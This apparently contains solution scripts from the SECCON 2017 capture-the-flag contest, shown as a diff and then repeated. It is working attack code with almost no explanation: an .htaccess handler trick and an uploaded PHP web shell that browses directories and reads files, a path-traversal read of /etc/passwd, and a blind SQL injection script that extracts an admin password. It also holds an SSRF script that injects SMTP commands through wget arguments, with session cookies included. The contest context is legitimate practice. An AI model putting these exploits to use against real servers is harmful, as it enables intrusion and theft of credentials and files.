castaneai · December 11, 2017 11:37
diff --git a/.htaccess b/.htaccess
 <FilesMatch "\.test$">
     SetHandler application/x-httpd-php
 </FilesMatch>
diff --git a/attack.php b/attack.php
 <?php
 $dir = $_GET['dir'];
 echo '<form action="" method="GET"><input type="text" name="dir" value="' . $dir . '"><input type="submit" value="ls"></form>';

 if (!is_dir($dir)) {
    exit;
 }

 $result = scandir($dir);
 echo '<ul>';
 foreach ($result as $f) {
    $p = $dir . '/' . $f;
    if (is_dir($p)) {
        echo '<li><a href="attack.test?dir=' . urlencode($p) . '">' . htmlspecialchars($f) . '</a></li>';
    } else if (is_file($p)) {
        echo '<li><a href="show.test?path=' . urlencode($p) . '">' . htmlspecialchars($f) . '</a></li>';
    }
 }
 echo '</ul>';
 ?>
diff --git a/automatic_door.py b/automatic_door.py
 import requests

 URL = "http://automatic_door.pwn.seccon.jp/0b503d0caf712352fc200bc5332c4f95"


 def write(filename, file_content):
    action = "write"
    files = {
        "file": file_content,
    }
    res = requests.post(URL + "/?action={}&filename={}".format(action, filename), files=files).text
    print(res)


 def read(filename):
    action = "read"
    res = requests.get(URL + "/?action={}&filename={}".format(action, filename)).text
    print(res)


 write("attack.test", open('attack.php', 'rb').read())
 write("show.test", open('show.php', 'rb').read())

 path = "/etc/passwd"
 read("../../../../../.." + path)
diff --git a/show.php b/show.php
 <?php
 $path = $_GET['path'];
 echo '<h2>' . $path . '</h2>';
 echo '<pre>';
 echo htmlspecialchars(file_get_contents($path));
 echo '</pre>';
diff --git a/sqlsrf01_blind_sql_injection.py b/sqlsrf01_blind_sql_injection.py
 # -*- coding: utf-8 -*-
 import sys
 import requests

 URL = "http://sqlsrf.pwn.seccon.jp/sqlsrf/index.cgi?"


 def check_strlen(i):
    params = {
        "user": "' UNION SELECT '58474452dda5c2bdc1f6869ace2ae9e3' FROM users WHERE username='admin' AND length(password) = {};--".format(i),
        "pass": "admin",
        "login": "login",
    }
    res = requests.post(URL, data=params).text
    return "Error!" not in res


 def check(i, cond):
    params = {
        "user": "' UNION SELECT '58474452dda5c2bdc1f6869ace2ae9e3' FROM users WHERE username='admin' AND substr(password, {0}, 1) {1};--".format(i + 1, cond),
        "pass": "admin",
        "login": "login",
    }
    res = requests.post(URL, data=params).text
    return "Error!" not in res


 def search_char(i, chars):
    # 二分探索
    lo = 0
    hi = len(chars)
    while lo < hi - 1:
        mid = (lo + hi) // 2
        mid_char = chr(chars[mid])
        if check(i, "< '{}'".format(mid_char)):
            hi = mid
        else:
            lo = mid
    return chr(chars[lo])


 def crange(start_char, end_char):
    return range(ord(start_char), ord(end_char) + 1)


 def search(i):
    chars = None
    if check(i, "<= '9'"):
        chars = crange('0', '9')
    elif check(i, "<= 'z'"):
        chars = crange('a', 'z')
    else:
        raise RuntimeError("flag char is out of range...")
    return search_char(i, chars)


 if __name__ == '__main__':
    password_length = 0
    for i in range(1, 50):
        if check_strlen(i):
            password_length = i
            break
    print("password length: {}".format(password_length))
    sys.stdout.write("encrypt password: ")
    sys.stdout.flush()
    for i in range(password_length):
        sys.stdout.write(search(i))
        sys.stdout.flush()
    print()
    print("done.")

diff --git a/sqlsrf02_send_email_to_root.py b/sqlsrf02_send_email_to_root.py
 import requests
 from pyquery import PyQuery as pq
 import html

 URL = "http://sqlsrf.pwn.seccon.jp/sqlsrf/menu.cgi?"
 MY_EMAIL_ADDRESS = "<input here your address>"

 commands = [
    "EHLO 127.0.0.1",
    "MAIL FROM: " + MY_EMAIL_ADDRESS,
    "RCPT TO: root",
    "DATA",
    "From: [email protected]",
    "To: " + MY_EMAIL_ADDRESS,
    "Subject: give me flag",
    "Hello",
    ".",
    "QUIT",
 ]

 data = {
    'cmd': "wget --debug -O /dev/stdout 'http://",
    'args': "127.0.0.1%0d%0a{}%0a:25/".format("%0a".join(commands).replace(":", "%3a").replace("@", "%40"))
 }


 data2 = {
    "cmd": "netstat -tnl",
    "args": "--help"
 }

 headers = {
    "Cookie": "remember=d2f37e101c0e76bcc90b5634a5510f64; CGISESSID=beb1229d5c77b445e59b9c2622f20d86",
 }

 res = requests.post(URL, data=data, headers=headers).text
 d = html.unescape(pq(res).find('pre').text())
 if d != '':
    print(d)
 else:
    print(res)
	<FilesMatch "\.test$">
	SetHandler application/x-httpd-php
	</FilesMatch>
	<?php
	$dir = $_GET['dir'];
	echo '<form action="" method="GET"><input type="text" name="dir" value="' . $dir . '"><input type="submit" value="ls"></form>';

	if (!is_dir($dir)) {
	exit;
	}

	$result = scandir($dir);
	echo '<ul>';
	foreach ($result as $f) {
	$p = $dir . '/' . $f;
	if (is_dir($p)) {
	echo '<li><a href="attack.test?dir=' . urlencode($p) . '">' . htmlspecialchars($f) . '</a></li>';
	} else if (is_file($p)) {
	echo '<li><a href="show.test?path=' . urlencode($p) . '">' . htmlspecialchars($f) . '</a></li>';
	}
	}
	echo '</ul>';
	?>
	import requests

	URL = "http://automatic_door.pwn.seccon.jp/0b503d0caf712352fc200bc5332c4f95"


	def write(filename, file_content):
	action = "write"
	files = {
	"file": file_content,
	}
	res = requests.post(URL + "/?action={}&filename={}".format(action, filename), files=files).text
	print(res)


	def read(filename):
	action = "read"
	res = requests.get(URL + "/?action={}&filename={}".format(action, filename)).text
	print(res)


	write("attack.test", open('attack.php', 'rb').read())
	write("show.test", open('show.php', 'rb').read())

	path = "/etc/passwd"
	read("../../../../../.." + path)
	<?php
	$path = $_GET['path'];
	echo '<h2>' . $path . '</h2>';
	echo '<pre>';
	echo htmlspecialchars(file_get_contents($path));
	echo '</pre>';
	# -- coding: utf-8 --
	import sys
	import requests

	URL = "http://sqlsrf.pwn.seccon.jp/sqlsrf/index.cgi?"


	def check_strlen(i):
	params = {
	"user": "' UNION SELECT '58474452dda5c2bdc1f6869ace2ae9e3' FROM users WHERE username='admin' AND length(password) = {};--".format(i),
	"pass": "admin",
	"login": "login",
	}
	res = requests.post(URL, data=params).text
	return "Error!" not in res


	def check(i, cond):
	params = {
	"user": "' UNION SELECT '58474452dda5c2bdc1f6869ace2ae9e3' FROM users WHERE username='admin' AND substr(password, {0}, 1) {1};--".format(i + 1, cond),
	"pass": "admin",
	"login": "login",
	}
	res = requests.post(URL, data=params).text
	return "Error!" not in res


	def search_char(i, chars):
	# 二分探索
	lo = 0
	hi = len(chars)
	while lo < hi - 1:
	mid = (lo + hi) // 2
	mid_char = chr(chars[mid])
	if check(i, "< '{}'".format(mid_char)):
	hi = mid
	else:
	lo = mid
	return chr(chars[lo])


	def crange(start_char, end_char):
	return range(ord(start_char), ord(end_char) + 1)


	def search(i):
	chars = None
	if check(i, "<= '9'"):
	chars = crange('0', '9')
	elif check(i, "<= 'z'"):
	chars = crange('a', 'z')
	else:
	raise RuntimeError("flag char is out of range...")
	return search_char(i, chars)


	if __name__ == '__main__':
	password_length = 0
	for i in range(1, 50):
	if check_strlen(i):
	password_length = i
	break
	print("password length: {}".format(password_length))
	sys.stdout.write("encrypt password: ")
	sys.stdout.flush()
	for i in range(password_length):
	sys.stdout.write(search(i))
	sys.stdout.flush()
	print()
	print("done.")
	import requests
	from pyquery import PyQuery as pq
	import html

	URL = "http://sqlsrf.pwn.seccon.jp/sqlsrf/menu.cgi?"
	MY_EMAIL_ADDRESS = "<input here your address>"

	commands = [
	"EHLO 127.0.0.1",
	"MAIL FROM: " + MY_EMAIL_ADDRESS,
	"RCPT TO: root",
	"DATA",
	"From: [email protected]",
	"To: " + MY_EMAIL_ADDRESS,
	"Subject: give me flag",
	"Hello",
	".",
	"QUIT",
	]

	data = {
	'cmd': "wget --debug -O /dev/stdout 'http://",
	'args': "127.0.0.1%0d%0a{}%0a:25/".format("%0a".join(commands).replace(":", "%3a").replace("@", "%40"))
	}


	data2 = {
	"cmd": "netstat -tnl",
	"args": "--help"
	}

	headers = {
	"Cookie": "remember=d2f37e101c0e76bcc90b5634a5510f64; CGISESSID=beb1229d5c77b445e59b9c2622f20d86",
	}

	res = requests.post(URL, data=data, headers=headers).text
	d = html.unescape(pq(res).find('pre').text())
	if d != '':
	print(d)
	else:
	print(res)